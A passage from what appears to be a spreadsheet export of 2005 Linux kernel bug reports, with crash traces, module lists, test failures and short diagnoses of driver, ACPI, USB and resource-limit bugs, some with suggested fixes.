[&lt;c03ce27e&gt;] schedule_timeout+0x75/0xbb [&lt;c0290a01&gt;] tty_release+0x14/0x1f [&lt;c0161d31&gt;] __fput+0x16d/0x1a6 [&lt;c0160259&gt;] filp_close+0x52/0x96 [&lt;c0160307&gt;] sys_close+0x6a/0x91 [&lt;c01030f5&gt;] syscall_call+0x7/0xb Code: ff 85 c0 89 c3 74 e4 89 34 24 e8 be 57 f5 ff eb da 55 bd ff ff ff ff 57 56 be 01 0 0 00 00 53 31 db 8b 54 24 14 8b 3a 89 e9 89 d8 &lt;f2&gt; ae f7 d1 49 8b 52 24 8d 74 31 01 85 d2 75 ea 5b 89 f0 5e 5f &lt;6&gt;usb 1-1.3: new full speed USB device using uhci_hcd and address 14 cdc_acm 1-1.3:1.0: ttyACM1: USB ACM device If pppd is stopped properly and then the phone is disconnected, there are no problems. I have recreated this problem on several different 2.6 kernels including kernels not tainted by binary only modules (nvidia and vmware). The vmware vm is not active at the time of this oops. Following is lsmod output after above oops: Module Size Used by msdos 8064 0 fat 35996 1 msdos ppp_deflate 5376 0 zlib_deflate 22296 1 ppp_deflate zlib_inflate 17664 1 ppp_deflate bsd_comp 5888 0 ppp_async 10112 1 crc_ccitt 2304 1 ppp_async ppp_generic 27412 3 ppp_deflate,bsd_comp,ppp_async slhc 6656 1 ppp_generic ipt_MASQUERADE 3200 1 ipt_LOG 6784 1 ipt_state 2048 1 iptable_nat 20028 2 ipt_MASQUERADE ip_conntrack 37832 3 ipt_MASQUERADE,ipt_state,iptable_nat iptable_filter 2688 1 ip_tables 21120 5 ipt_MASQUERADE,ipt_LOG,ipt_state,iptable_nat,iptable_filter nvidia 3916700 12 vmnet 28580 2 vmmon 169292 0 snd_seq_midi 7072 0 snd_emu10k1_synth 7296 0 snd_emux_synth 35200 1 snd_emu10k1_synth snd_seq_virmidi 6528 1 snd_emux_synth snd_seq_midi_emul 7296 1 snd_emux_synth snd_pcm_oss 48672 0 snd_mixer_oss 17536 1 snd_pcm_oss snd_seq_oss 32256 0 snd_seq_midi_event 6912 3 snd_seq_midi,snd_seq_virmidi,snd_seq_oss snd_seq 50960 8 snd_seq_midi,snd_emux_synth,snd_seq_virmidi,snd_seq_midi_emul,snd_seq_oss,snd_seq_midi_event snd_emu10k1 102788 3 snd_emu10k1_synth snd_rawmidi 20640 3 snd_seq_midi,snd_seq_virmidi,snd_emu10k1 snd_seq_device 7436 7 snd_seq_midi,snd_emu10k1_synth,snd_emux_synth,snd_seq_oss,snd_seq,snd_emu10k1,snd_rawmidi snd_ac97_codec 73720 1 snd_emu10k1 snd_pcm 82436 3 snd_pcm_oss,snd_emu10k1,snd_ac97_codec snd_timer 21892 3 snd_seq,snd_emu10k1,snd_pcm snd_page_alloc 8068 2 snd_emu10k1,snd_pcm snd_util_mem 3968 2 snd_emux_synth,snd_emu10k1 snd_hwdep 7584 2 snd_emux_synth,snd_emu10k1 snd 46564 17 snd_emux_synth,snd_seq_virmidi,snd_pcm_oss,snd_mixer_oss,snd_seq_oss,snd_seq,snd_emu10k1,snd_rawmidi,snd_seq_device,snd_ac97_codec,snd_pcm,snd_timer,snd_hwdep soundcore 8160 1 snd cdc_acm 10400 2 Steps to reproduce: 1. connect audiovox 9900 cellphone 2. make a data call using pppd 3. cause a usb disconnect, either by the phone resetting, powering off or unplugging the usb cable</t>
  </si>
  <si>
    <t>2.6.11.6</t>
  </si>
  <si>
    <t>Milo Casagrande</t>
  </si>
  <si>
    <t>2.6.12-rc1-mm1-rc5-mm1, 2.6.13-rc2-mm1 and above</t>
  </si>
  <si>
    <t>2005-03-29 02:17 UTC</t>
  </si>
  <si>
    <t>2005-08-03 20:30 UTC</t>
  </si>
  <si>
    <t>Distribution: SUSE 9.2 x86-64 Hardware Environment: Asus L5D Problem Description: The box hangs solid while resuming from disk, after the system image has been restored. Apparently, the hang occurs as a result of the call to pci_write_config_word() with pmcsr = 0 in drivers/pci/pci.c:pci_set_power_state(). In fact, the function pci_write_config_word() completes successfully but the box hangs during msleep() afterwards. It cartainly is related to the fact that ACPI PCI links are not set before pci_set_power_state() is called. Steps to reproduce: Suspend the box to disk and try to resume it. The problem is 100% reproducible. Greets, Rafael</t>
  </si>
  <si>
    <t>(net tulip) Problem with 6 bit addressing in tulip_read_eeprom()</t>
  </si>
  <si>
    <t>2005-03-30 04:01 UTC</t>
  </si>
  <si>
    <t>Daniel Forsgren</t>
  </si>
  <si>
    <t>2008-09-22 12:07 UTC</t>
  </si>
  <si>
    <t>(I posted this bug at http://sourceforge.net/projects/tulip/, before I realized that that bug tracker was deprecated. So it probably belongs here instead.) Problem ======= There seems to be a problem when running the tulip driver with 6 bit eeprom address length: The tulip_read_eeprom() function sets up a read command like: int read_cmd = location | (EE_READ_CMD &lt;&lt; addr_len); where location is the offset (within the eeprom) and addr_len is either 6 or 8 bits. However, with addr_len == 6 and location &gt; 0x3f, the most significant location bits would overlap with the read command itself. Thus, with 6 bit addressing, tulip_read_eeprom() must not be called with location &gt; 0x3f. Unfortunately, in tulip_core.c, it's called with location up to sizeof(tp-&gt;eeprom)/2, which should be 0x100 if I'm not mistaken. In the same way de2104x.c uses locations up to DE_EEPROM_WORDS, which is equal to 256 too. How-to-fix ========== Make sure that the location is masked corresponding to add_len in tulip_read_eeprom().</t>
  </si>
  <si>
    <t>/proc/cpuinfo reports PNI support on Athlon and Athlon-XP</t>
  </si>
  <si>
    <t>&gt;=2.6.10</t>
  </si>
  <si>
    <t>2005-03-30 17:04 UTC</t>
  </si>
  <si>
    <t>Matt Taylor</t>
  </si>
  <si>
    <t>2005-04-26 18:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: AMD Athlon Thunderbird and AMD Athlon-XP Barton Software Environment: Problem Description: cat /proc/cpuinfo is reporting pni(Prescott New Instructions or SSE3) support on my Athlon and Athlon-XP chips. This instruction set was added with the P4 Prescott and Opteron x52. kernel-2.6.11-r3 processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 10 model name : AMD Athlon(tm) XP stepping : 0 cpu MHz : 2204.807 cache size : 512 KB physical id : 0 siblings : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse pni syscall mmxext 3dnowext 3dnow bogomips : 4358.14 kernel-2.6.10-r4 and kernel-2.6.11-r4 processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 4 model name : AMD Athlon(tm) processor stepping : 2 cpu MHz : 850.662 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 mmx fxsr pni syscall mmxext 3dnowext 3dnow bogomips : 1667.07 The Athlon-XP dual boots WinXP and CPU-Z correctly reports no PNI support. A different Athlon-XP box is running 2.6.7-r14 and it correctly reports no PNI. I tested stock kernel.org kernels 2.6.7 through 2.6.12-rc1-mm3 and 2.6.10 and up have this behaviour. Steps to reproduce: cat /proc/cpuinfo</t>
  </si>
  <si>
    <t>lutimes needed for cp -a to use</t>
  </si>
  <si>
    <t>2005-04-01 18:36 UTC</t>
  </si>
  <si>
    <t>Brian 'netdragon' Bober</t>
  </si>
  <si>
    <t>2007-05-14 11:39 UTC</t>
  </si>
  <si>
    <t>The lutimes() syscall needs to be implemented When using cp -a, it doesn't preserve the timestamps of the symlinks. This is very annoying for backup purposes because it's sometimes important to see when symlinks were created when backing up a large block of files. It also helps in using "ls -alR" to "diff -u" the outputs of the source and destination of a backup copy. http://lists.gnu.org/archive/html/bug-fileutils/2003-05/msg00022.html According to this thread, there is an lutimes function equivalent to utimes. There has been a lot of discussion that people want this.</t>
  </si>
  <si>
    <t>Wrong URL to ATI product page</t>
  </si>
  <si>
    <t>&lt;=2.6.11.6</t>
  </si>
  <si>
    <t>2005-04-05 13:22 UTC</t>
  </si>
  <si>
    <t>Reto Gantenbein</t>
  </si>
  <si>
    <t>2006-03-21 14:27 UTC</t>
  </si>
  <si>
    <t>Distribution: all Hardware Environment: all Software Environment: all Problem Description: incorrect link to the ati-product page in drivers/char/drm/Kconfig and drivers/video/Kconfig: http://www.ati.com/na/pages/products/pc/radeon32/index.html</t>
  </si>
  <si>
    <t>Problems with Intel ICH6-M Sonoma Chipset and IDE / SATA Conflicts</t>
  </si>
  <si>
    <t>2005-04-09 13:47 UTC</t>
  </si>
  <si>
    <t>nino</t>
  </si>
  <si>
    <t>2005-05-26 15:32 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake, Knoppix, PCLinuxOS, most all Hardware Environment:Dell Latitude D810 Software Environment: Problem Description: When trying to boot using this laptop which uses the brand new and VERY popular ICH6-M chipset the system hangs. I believe that this is due to the fact that this mobile chipset has the ability to run in SATA or IDE mode. Currently the IDE mode is the one being used and unless the kernel is recompiled with the proper options enabled the user is greeted with a blank screen. Getting a system to boot via IDE results in 1/10th the performance as DMA is not enabled. Essentially, the system gets confused as to which to use upon bootup and defaults to SATA which isn't the correct one. This is the latest Intel chipset for mobiles and should greatly affect the "linux on the laptop" market for newer notebooks. Steps to reproduce: 1) try to use the 2.6.x kernel with BOTH IDE and SATA drivers built as either modules or built into the kernel 2) the only way to get the system to boot is to NOT build any of the SATA drivers (PIIx and such) and of course build the IDE drivers (PIIx) into the kernel. In this mode the system boots and runs but with terrible performance. Let me know if/when a patch is created and I'll give it a shot.</t>
  </si>
  <si>
    <t>Josh Boyer</t>
  </si>
  <si>
    <t>(net de2104x) PCI memory address incorrectly (?) sign extended</t>
  </si>
  <si>
    <t>2005-04-11 15:51 UTC</t>
  </si>
  <si>
    <t>2005-08-31 03:11 UTC</t>
  </si>
  <si>
    <t>I'm using the 2.6.11.6 kernel (configured for ppc440gp/ebony), and I've experienced the following problem with a dec21041 device and the tulip driver: During boot, when the tulip driver is loaded, there are a lot of accesses to address 0xFFFFFEFC8 within the physical address space (440gp has 36 bit physical addresses). These addresses *don't* match the outbound pci map (of the plb-to-pcix bridge). However, the CSRs of my dec21041 device happens to be allocated at 0xFFFFEF80 (note, one "F" less - just 32 bit) in pci memory space. Assuming that the driver were accessing the dec21041 eeprom, then it would make sense to access 0xFFFFEFC8. So everything should be fine, if it weren't for that extra "F" :-) I think the problems is this: drivers/net/tulip/de2104x.c: de_init_one() declares the variable "pciaddr" as "long" (4 byte *signed*). It holds the location of CSRs in pci memory (in my case 0xFFFFEF80). It's passed as an argument to ioremap(), which takes an argument of type phys_addr_t (see arch/ppc/mm/pgtable.c). On the ppc440gp platform, the phys_addr_t is defined as unsigned long long, i.e., 64 bit *unsigned*. So the pciaddr 0xFFFFEF80 is (incorrectly) sign extended to 0xF...FFFFEF80. It's later on passed to fixup_bigphys_addr(), but now it's outside the pci memory space, due to this sign extension. (Just declaring "pciaddr" as *unsigned* long should solve this).</t>
  </si>
  <si>
    <t>Processor C states not working with 2.6.11.6 - ASUS M6Ne</t>
  </si>
  <si>
    <t>2005-04-13 12:54 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: ASUS M6Ne with BIOS 2.08A (note this is an Ne, and 2.08A is the latest bios version) Software Environment: Vanilla Sources 2.6.11.6 with "implicit return fix" Problem Description: The C Processor states are not working: bash-2.05b# cat /proc/acpi/processor/CPU1/ info limit power throttling bash-2.05b# cat /proc/acpi/processor/CPU1/power active state: C0 max_cstate: C8 bus master activity: 00000000 states: C1: &lt;not supported&gt; bash-2.05b# dmesg showes : ACPI: Sleep Button (CM) [SLPB] ACPI: Video Device [VGA] (multi-head: yes rom: no post: no) acpi_processor-0496 [67] acpi_processor_get_inf: Invalid PBLK length [7] ACPI: Thermal Zone [THRM] (47 C) The C1 and C2 states are working, if you use an 2.6.9 kernel with the "_cst" patches, which should do the same as the "implicit return fix" afaik. Everything else works great on 2.6.11 (nice work ;-) ) I use following kernel parameters : nolapic acpi_fake_ecdt resume=/dev/hda6 Greetings Janosch</t>
  </si>
  <si>
    <t>Losing keypresses, ghost presses, synch problems with keyboard when using leds</t>
  </si>
  <si>
    <t>2.6.11.7</t>
  </si>
  <si>
    <t>2005-04-13 15:10 UTC</t>
  </si>
  <si>
    <t>furryball</t>
  </si>
  <si>
    <t>2006-04-03 15:01 UTC</t>
  </si>
  <si>
    <t>This old problem from January, discussed on LKML, seems to be still unfixed. Bump? http://seclists.org/lists/linux-kernel/2005/Jan/1327.html I have today managed to crash 2.6.11.7 5 times because of this and experienced lots of missing keys and other weird phenomena when I have had some casual blinking on the keyboard leds. ~5 led setting ioctl()s per second seem to be the limit and after that things start getting weird. That's quite little traffic, even for the old ps/2. ... Nothing important. Just toys. But is there a reason why the toys should break. :)</t>
  </si>
  <si>
    <t>gettimeofday02 failed with 2.6.11-mm4 on ppc64</t>
  </si>
  <si>
    <t>2.6.11-mm4</t>
  </si>
  <si>
    <t>2005-04-14 02:36 UTC</t>
  </si>
  <si>
    <t>Wenbin Han</t>
  </si>
  <si>
    <t>2005-10-11 17:57 UTC</t>
  </si>
  <si>
    <t>James He</t>
  </si>
  <si>
    <t>Distribution: RHEL4 with kernel 2.6.11-mm4 Hardware Environment: IBM OpenPower( CHRP IBM,9124-720 ) Software Environment: RHEL4 Problem Description: gettimeofday02 failed. Steps to reproduce: 1. extract ltp-full-20050307 tarball. 2. compile ltp with "gcc -m64" 3. run ltpstress.sh or , you can run gettimeofday02 solely like this: #gettimeofday02 -c &lt;n&gt; this will run n copies of gettimeofday02 concurrently and you will get failure information. ------fail information:------ gettimeofday02 1 FAIL : Time is going backwards (old 1113398832.811969 vs new 1113398832.811968!</t>
  </si>
  <si>
    <t>readv/writev failures in kernel 2.6.11-mm4 on RHEL4</t>
  </si>
  <si>
    <t>2005-04-14 02:55 UTC</t>
  </si>
  <si>
    <t>2005-08-28 19:44 UTC</t>
  </si>
  <si>
    <t>Distribution: RHEL4 with kernel 2.6.11-mm4 Hardware Environment: IBM OpenPower( CHRP IBM,9124-720 ) Software Environment: RHEL4 Problem Description: writev01,writev03,writev04, readv02 failed. Steps to Reproduce: 1. extract ltp-full-20050307 tarball. 2. compile ltp with "gcc -m64" 3. run ltpstress.sh or you can run these testcases under testcase/bin directly. information output of writev01: [root@fv42-lv1 bin]# ./writev01 writev01 0 INFO : Enter Block 1 writev01 1 FAIL : Expected errno = EINVAL, got 14 writev01 0 INFO : block 1 FAILED writev01 0 INFO : Exit block 1 writev01 0 INFO : Enter block 2 writev01 0 INFO : block 2 PASSED writev01 0 INFO : Exit block 2 writev01 0 INFO : Enter block 3 writev01 0 INFO : block 3 PASSED writev01 0 INFO : Exit block 3 writev01 0 INFO : Enter block 4 writev01 0 INFO : Received EBADF as expected writev01 0 INFO : block 4 PASSED writev01 0 INFO : Exit block 4 writev01 0 INFO : Enter block 5 writev01 0 INFO : Received EINVAL as expected writev01 0 INFO : block 5 PASSED writev01 0 INFO : Exit block 5 writev01 0 INFO : Enter block 6 writev01 2 PASS : writev() wrote 0 iovectors writev01 0 INFO : block 6 PASSED writev01 0 INFO : Exit block 6 writev01 0 INFO : Enter block 7 writev01 3 PASS : writev passed writing 64 bytes, followed by two NULL vectors writev01 0 INFO : block 7 PASSED writev01 0 INFO : Exit block 7 writev01 0 INFO : Enter block 8 writev01 0 INFO : Received EPIPE as expected writev01 0 INFO : block 8 PASSED writev01 0 INFO : Exit block 8 -------- -------- information output of writev03: [root@fv42-lv1 bin]# ./writev03 writev03 0 INFO : Enter block 1 writev03 1 FAIL : Got error EFAULT writev03 0 INFO : block 1 FAILED writev03 0 INFO : Exit block 1 writev03 0 INFO : Enter block 2 writev03 2 FAIL : Got error EFAULT writev03 0 INFO : block 2 FAILED writev03 0 INFO : Exit block 2 writev03 0 INFO : Enter block 3 writev03 3 FAIL : Got error EFAULT writev03 0 INFO : block 3 FAILED writev03 0 INFO : Exit block 3 -------- -------- information output of writev04: [root@fv42-lv1 bin]# ./writev04 writev04 0 INFO : Enter block 1 writev04 1 FAIL : Got error EFAULT writev04 0 INFO : block 1 FAILED writev04 0 INFO : Exit block 1 writev04 0 INFO : Enter block 2 writev04 2 FAIL : Got error EFAULT writev04 0 INFO : block 2 FAILED writev04 0 INFO : Exit block 2 writev04 0 INFO : Enter block 3 writev04 3 FAIL : Got error EFAULT writev04 0 INFO : block 3 FAILED writev04 0 INFO : Exit block 3 -------- -------- information output of readv02: [root@fv42-lv1 bin]# ./readv02 readv02 1 FAIL : readv() set an illegal errno: expected: EINVAL, got 14 readv02 2 PASS : got EFAULT readv02 3 PASS : got EBADF readv02 4 PASS : got EINVAL ---------- ---------- writev01 strace information: open("writev_data_file.3830", O_RDWR) = 3 fstat(1, {st_mode=0, st_size=21474836480, ...}) = 0 mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x8000001000 write(1, "writev01 0 INFO : Enter Bl"..., 38writev01 0 INFO : Enter Block 1 ) = 38 writev(3, [{"\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1"..., 18446744073709551615}], 1) = -1 EFAULT (Bad address) write(1, "writev01 1 FAIL : Expected"..., 56writev01 1 FAIL : Expected errno = EINVAL, got 14 ) = 56 write(1, "writev01 0 INFO : block 1 "..., 39writev01 0 INFO : block 1 FAILED ) = 39 write(1, "writev01 0 INFO : Exit blo"..., 37writev01 0 INFO : Exit block 1 ) = 37</t>
  </si>
  <si>
    <t>2.6.12-rc6:  Unplugging/replugging USB Logitech headset when in use busts USB, kills keyboard</t>
  </si>
  <si>
    <t>2.6.12-rc2</t>
  </si>
  <si>
    <t>2005-04-14 12:53 UTC</t>
  </si>
  <si>
    <t>Waldo</t>
  </si>
  <si>
    <t>2005-06-18 18:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo (stable) Hardware Environment: amd64 3500+ w/1 gig RAM. USB Logitech headset. PS/2 keyboard, USB 5-button Intellimouse. NForce 3 chipset. Box is a Shuttle, model SN95G5. Software Environment: GNOME 2.10 (although it crashed w/2.8 too), Skype (to demonstrate the problem). Kernel is 2.6.12-rc2. Problem Description: Hotplugging my USB Logitech headset works fine...unless I'm actually using it, at which point re-plugging does nothing to restore the device. Also, when replugging it, my ps/2 keyboard locks up and accepts no input. Finally, when I attempt to reboot or shutdown following this, the shutdown sequence does not proceed past clearing the screen. Rather, it hangs just after GNOME and gdm quit. Steps to reproduce: (All debug messages below are from dmesg) 1. Upon startup, the logitech device is recognized. (This is a bit of the startup sequence messages in dmesg): usb 2-1.1: new full speed USB device using ohci_hcd and address 3 usb 2-1.1: ep0 maxpacket = 8 usb 2-1.1: skipped 11 descriptors after interface usb 2-1.1: skipped 2 descriptors after interface usb 2-1.1: skipped 1 descriptor after endpoint usb 2-1.1: skipped 2 descriptors after interface usb 2-1.1: skipped 1 descriptor after endpoint usb 2-1.1: skipped 2 descriptors after interface usb 2-1.1: skipped 1 descriptor after endpoint usb 2-1.1: default language 0x0409 usb 2-1.1: new device strings: Mfr=1, Product=2, SerialNumber=0 usb 2-1.1: Product: Logitech USB Headset usb 2-1.1: Manufacturer: Logitech usb 2-1.1: hotplug usb 2-1.1: adding 2-1.1:1.0 (config #1, interface 0) usb 2-1.1:1.0: hotplug usb 2-1.1: adding 2-1.1:1.1 (config #1, interface 1) usb 2-1.1:1.1: hotplug usb 2-1.1: adding 2-1.1:1.2 (config #1, interface 2) usb 2-1.1:1.2: hotplug 2. I'll demonstrate that USB unplug/replug works normally when the USB Logitech headset is not actively being used: hub 2-1:1.0: state 5 ports 4 chg 0000 evt 0002 hub 2-1:1.0: port 1, status 0100, change 0001, 12 Mb/s usb 2-1.1: USB disconnect, address 3 usb 2-1.1: usb_disable_device nuking all URBs usb 2-1.1: unregistering interface 2-1.1:1.0 usb 2-1.1:1.0: hotplug usb 2-1.1: unregistering interface 2-1.1:1.1 usb 2-1.1:1.1: hotplug usb 2-1.1: unregistering interface 2-1.1:1.2 usb 2-1.1:1.2: hotplug usb 2-1.1: unregistering device usb 2-1.1: hotplug hub 2-1:1.0: debounce: port 1: total 100ms stable 100ms status 0x100 hub 2-1:1.0: state 5 ports 4 chg 0000 evt 0002 hub 2-1:1.0: port 1, status 0101, change 0001, 12 Mb/s hub 2-1:1.0: debounce: port 1: total 100ms stable 100ms status 0x101 usb 2-1.1: new full speed USB device using ohci_hcd and address 6 usb 2-1.1: ep0 maxpacket = 8 usb 2-1.1: skipped 11 descriptors after interface usb 2-1.1: skipped 2 descriptors after interface usb 2-1.1: skipped 1 descriptor after endpoint usb 2-1.1: skipped 2 descriptors after interface usb 2-1.1: skipped 1 descriptor after endpoint usb 2-1.1: skipped 2 descriptors after interface usb 2-1.1: skipped 1 descriptor after endpoint usb 2-1.1: default language 0x0409 usb 2-1.1: new device strings: Mfr=1, Product=2, SerialNumber=0 usb 2-1.1: Product: Logitech USB Headset usb 2-1.1: Manufacturer: Logitech usb 2-1.1: hotplug usb 2-1.1: adding 2-1.1:1.0 (config #1, interface 0) usb 2-1.1:1.0: hotplug snd-usb-audio 2-1.1:1.0: usb_probe_interface snd-usb-audio 2-1.1:1.0: usb_probe_interface - got id usb 2-1.1: adding 2-1.1:1.1 (config #1, interface 1) usb 2-1.1:1.1: hotplug usb 2-1.1: adding 2-1.1:1.2 (config #1, interface 2) usb 2-1.1:1.2: hotplug hub 2-1:1.0: 198mA power budget left hub 2-1:1.0: state 5 ports 4 chg 0000 evt 0002 3. Now i'll unplug while talking to someone on Skype: hub 2-1:1.0: state 5 ports 4 chg 0000 evt 0002 hub 2-1:1.0: port 1, status 0100, change 0001, 12 Mb/s usb 2-1.1: USB disconnect, address 6 usb 2-1.1: usb_disable_device nuking all URBs ohci_hcd 0000:00:02.0: shutdown urb ffff81002ed08900 pipe 00008600 ep1out-iso ohci_hcd 0000:00:02.0: shutdown urb ffff81002ed08a80 pipe 00008600 ep1out-iso usb 2-1.1: unregistering interface 2-1.1:1.0 usb 2-1.1:1.0: hotplug usb 2-1.1: unregistering interface 2-1.1:1.1 usb 2-1.1:1.1: hotplug usb 2-1.1: unregistering interface 2-1.1:1.2 usb 2-1.1:1.2: hotplug usb 2-1.1: unregistering device usb 2-1.1: hotplug hub 2-1:1.0: debounce: port 1: total 100ms stable 100ms status 0x100 4. Now I'll replug it. Note that this is where I lose the keyboard. hub 2-1:1.0: state 5 ports 4 chg 0000 evt 0002 hub 2-1:1.0: port 1, status 0101, change 0001, 12 Mb/s hub 2-1:1.0: debounce: port 1: total 100ms stable 100ms status 0x101 usb 2-1.1: new full speed USB device using ohci_hcd and address 7 usb 2-1.1: ep0 maxpacket = 8 usb 2-1.1: skipped 11 descriptors after interface usb 2-1.1: skipped 2 descriptors after interface usb 2-1.1: skipped 1 descriptor after endpoint usb 2-1.1: skipped 2 descriptors after interface usb 2-1.1: skipped 1 descriptor after endpoint usb 2-1.1: skipped 2 descriptors after interface usb 2-1.1: skipped 1 descriptor after endpoint usb 2-1.1: default language 0x0409 usb 2-1.1: new device strings: Mfr=1, Product=2, SerialNumber=0 usb 2-1.1: Product: Logitech USB Headset usb 2-1.1: Manufacturer: Logitech usb 2-1.1: hotplug usb 2-1.1: adding 2-1.1:1.0 (config #1, interface 0) usb 2-1.1:1.0: hotplug snd-usb-audio 2-1.1:1.0: usb_probe_interface snd-usb-audio 2-1.1:1.0: usb_probe_interface - got id cannot find the slot for index 1 (range 0-1) cannot create card instance 0 snd-usb-audio: probe of 2-1.1:1.0 failed with error -5 usb 2-1.1: adding 2-1.1:1.1 (config #1, interface 1) usb 2-1.1:1.1: hotplug usb 2-1.1: adding 2-1.1:1.2 (config #1, interface 2) usb 2-1.1:1.2: hotplug hub 2-1:1.0: 198mA power budget left hub 2-1:1.0: state 5 ports 4 chg 0000 evt 0002 5. Since I cannot type any more, I have no choice but to shutdown. GNOME quits fine. So does gdm. Then the screen blanks and I get a non-flashing cursor in the top left of the screen, and a total lockup. Here's what dmesg has to say about it: Unable to handle kernel NULL pointer dereference at 0000000000000000 RIP: &lt;ffffffff8023ba80&gt;{strlen+0} PGD 3ee97067 PUD 3ee8f067 PMD 0 Oops: 0000 [1] PREEMPT CPU 0 Modules linked in: it87 i2c_sensor i2c_isa i2c_nforce2 i2c_core sk98lin snd_usb_audio snd_usb_lib snd_rawmidi snd_intel8x0 snd_ac97_codec nvidia video loop Pid: 3, comm: events/0 Tainted: P 2.6.12-rc2 RIP: 0010:[&lt;ffffffff8023ba80&gt;] &lt;ffffffff8023ba80&gt;{strlen+0} RSP: 0018:ffff81000214bbc0 EFLAGS: 00010282 RAX: 0000000000000058 RBX: ffff8100022560e0 RCX: 000000000000001a RDX: ffff8100022509f0 RSI: 00000000000000d0 RDI: 0000000000000000 RBP: 0000000000000001 R08: ffff810002256058 R09: 00000000000003a8 R10: ffffffff802a0da0 R11: ffffffff80325e00 R12: ffff8100022509f0 R13: 00000000000000d0 R14: ffff8100022560e0 R15: 000000000000001a FS: 00002aaaaade7ae0(0000) GS:ffffffff80557f00(0000) knlGS:00000000560e2b30 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 0000000000000000 CR3: 000000003eea5000 CR4: 00000000000006e0 Process events/0 (pid: 3, threadinfo ffff81000214a000, task ffff81003ffb06d0) Stack: ffffffff80238dbe ffffffff804bc620 ffff810002256098 ffff8100022509f0 00000000000003a8 ffff810002256058 ffffffff802a0e0a 0000000000000286 0000000000000003 000000000226ac00 Call Trace:&lt;ffffffff80238dbe&gt;{kobject_get_path+30} &lt;ffffffff802a0e0a&gt;{class_hotplug+106} &lt;ffffffff80239bc2&gt;{kobject_hotplug+498} &lt;ffffffff802391de&gt;{kobject_del+14} &lt;ffffffff802a1360&gt;{class_device_del+256} &lt;ffffffff802a1389&gt;{class_device_unregister+9} &lt;ffffffff80359039&gt;{snd_unregister_device+185} &lt;ffffffff80363bc3&gt;{snd_pcm_dev_unregister+115} &lt;ffffffff803599f0&gt;{snd_card_free_thread+0} &lt;ffffffff8035e5ba&gt;{snd_device_free+90} &lt;ffffffff8035e81b&gt;{snd_device_free_all+75} &lt;ffffffff803598ed&gt;{snd_card_free+349} &lt;ffffffff801458f0&gt;{autoremove_wake_function+0} &lt;ffffffff801458f0&gt;{autoremove_wake_function+0} &lt;ffffffff80359a80&gt;{snd_card_free_thread+144} &lt;ffffffff8014099d&gt;{worker_thread+541} &lt;ffffffff8012b080&gt;{default_wake_function+0} &lt;ffffffff8012b080&gt;{default_wake_function+0} &lt;ffffffff80140780&gt;{worker_thread+0} &lt;ffffffff801452ad&gt;{kthread+205} &lt;ffffffff8010e357&gt;{child_rip+8} &lt;ffffffff80236450&gt;{dummy_d_instantiate+0} &lt;ffffffff801451e0&gt;{kthread+0} &lt;ffffffff8010e34f&gt;{child_rip+0} Code: 80 3f 00 48 89 f8 74 08 48 ff c0 80 38 00 eb f6 48 29 f8 c3 RIP &lt;ffffffff8023ba80&gt;{strlen+0} RSP &lt;ffff81000214bbc0&gt; CR2: 0000000000000000 At this point, all I can do is reset the machine. This error is reproducible every time. Hope this is useful. W</t>
  </si>
  <si>
    <t>2005-04-17 07:51 UTC</t>
  </si>
  <si>
    <t>Gang Xiao</t>
  </si>
  <si>
    <t>2005-05-19 11:47 UTC</t>
  </si>
  <si>
    <t>Chris Wright</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: Problem Description: In all kernel versions incorporating RLIMIT_AS up to 2.6.10, the limit checking uses the following style of comparison. if(existing + request &gt; rlim[RLIMIT_AS].rlim.cur) return -ENOMEM; If a request is deliberately high so that existing + request &gt; 2^32 (on 32 bit architectures), this checking becomes void. This should be considered as a vulnerability. It is not clear whether this may lead to effective exploits, because there are other limitation checks. But it is clear that this is not correct. Suggestion for correction: if(request &gt; limit || existing + request &gt; limit)</t>
  </si>
  <si>
    <t>usb0 not appearing when loading usbnet driver</t>
  </si>
  <si>
    <t>&gt;2.6.11.x</t>
  </si>
  <si>
    <t>2005-04-17 19:09 UTC</t>
  </si>
  <si>
    <t>Dan Miller</t>
  </si>
  <si>
    <t>2005-06-15 05:41 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo (kernel from kernel.org) Hardware Environment: 0000:00:00.0 Host bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133] (rev 03) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 8 Region 0: Memory at d8000000 (32-bit, prefetchable) Capabilities: [a0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP+ GART64- 64bit- FW- Rate=x2 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:01.0 PCI bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133 AGP] (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, 